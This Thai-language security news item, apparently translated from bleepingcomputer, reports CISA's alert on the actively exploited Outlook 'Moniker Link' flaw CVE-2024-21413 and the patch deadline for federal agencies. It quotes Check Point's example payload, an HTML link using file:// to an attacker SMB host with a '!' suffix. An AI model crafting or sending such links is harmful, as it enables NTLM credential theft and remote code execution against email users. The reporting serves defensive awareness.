CISA แจ้งเตือนหน่วยงานรัฐบาลกลางของสหรัฐฯ เมื่อวันพฤหัสบดีให้รักษาความปลอดภัยในระบบ เพื่อป้องกันการโจมตีที่กำลังเกิดขึ้น ซึ่งมุ่งเป้าไปที่ช่องโหว่ระดับ Critical ใน Microsoft Outlook ที่สามารถทำให้เกิดการเรียกใช้โค้ดที่เป็นอันตรายจากระยะไกล (Remote Code Execution) ได้
ช่องโหว่ดังกล่าวถูกพบโดยนักวิจัยจาก Check Point 'Haifei Li' และมีหมายเลข CVE-2024-21413 เกิดจากการตรวจสอบข้อมูลอินพุตที่ไม่เหมาะสม เมื่อเปิดอีเมลที่มีลิงก์อันตราย โดยใช้เวอร์ชันของ Outlook ที่มีช่องโหว่
ผู้ไม่หวังดีสามารถดำเนินการเรียกใช้โค้ดที่เป็นอันตรายจากระยะไกลได้ เนื่องจากช่องโหว่ดังกล่าวทำให้สามารถ bypass ฟีเจอร์ Protected View (ซึ่งควรจะบล็อกเนื้อหาที่เป็นอันตรายที่ฝังอยู่ในไฟล์ Office โดยการเปิดไฟล์เหล่านั้นในโหมด read-only) และเปิดไฟล์ Office ที่เป็นอันตรายในโหมด editing ได้
เมื่อ Microsoft ได้แก้ไขช่องโหว่ CVE-2024-21413 เมื่อช่วงหนึ่งปีก่อน ทาง Microsoft ได้เตือนว่า Preview Pane เป็นช่องทางการโจมตีที่สามารถทำให้การโจมตีสำเร็จได้ แม้จะเพียงแค่ preview เอกสาร Office ที่เป็นอันตรายก็ตาม
ตามที่ Check Point อธิบาย ช่องโหว่ด้านความปลอดภัยนี้ (เรียกว่า Moniker Link) ช่วยให้ผู้ไม่หวังดี สามารถ bypass การป้องกันที่มีอยู่ใน Outlook สำหรับลิงก์ที่เป็นอันตรายที่ฝังอยู่ในอีเมล โดยใช้โปรโตคอล file:// และการเพิ่มเครื่องหมายอัศเจรีย์ "!" ใน URL ที่ชี้ไปยังเซิร์ฟเวอร์ที่ถูกควบคุมโดยผู้ไม่หวังดี
เครื่องหมายอัศเจรีย์ "!" จะถูกเพิ่มหลังจากนามสกุลไฟล์ พร้อมกับข้อความแบบสุ่ม (ในตัวอย่างของ Check Point ใช้คำว่า "something") ดังที่แสดงด้านล่าง
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
CVE-2024-21413 ส่งผลกระทบต่อผลิตภัณฑ์ Office หลายรายการ รวมถึง Microsoft Office LTSC 2021, Microsoft 365 Apps for Enterprise, Microsoft Outlook 2016, และ Microsoft Office 2019 โดยการโจมตีที่สำเร็จจาก CVE-2024-21413 อาจส่งผลให้ข้อมูล NTLM credentials ถูกขโมย และการเรียกใช้โค้ดที่เป็นอันตรายผ่านเอกสาร Office
ในวันพฤหัสบดีที่ผ่านมา (6 กุมภาพันธ์ 2025) CISA ได้เพิ่มช่องโหว่นี้ลงในแคตตาล็อก Known Exploited Vulnerabilities (KEV) โดยระบุว่าเป็นช่องโหว่ที่กำลังถูกใช้ในการโจมตีอย่างต่อเนื่อง ตามที่ได้รับคำสั่งจาก Binding Operational Directive (BOD) 22-01 หน่วยงานรัฐบาลกลางจะต้องรักษาความปลอดภัยเครือข่ายของตนภายในสามสัปดาห์ (ภายในวันที่ 27 กุมภาพันธ์ 2025)
หน่วยงานความมั่นคงทางไซเบอร์เตือนว่า "ช่องโหว่ประเภทนี้เป็นช่องทางการโจมตีที่พบได้บ่อยสำหรับผู้ไม่หวังดีทางไซเบอร์ และก่อให้เกิดความเสี่ยงที่สำคัญต่อองค์กรของรัฐบาลกลาง"
ขณะที่ CISA ให้ความสำคัญกับการแจ้งเตือนหน่วยงานรัฐบาลกลางเกี่ยวกับช่องโหว่ที่ควรอัปเดตโดยด่วน องค์กรเอกชนก็ควรจัดลำดับความสำคัญในการแก้ไขช่องโหว่เหล่านี้เพื่อป้องกันการโจมตีที่กำลังดำเนินอยู่
ที่มา : bleepingcomputer
You must be logged in to post a comment.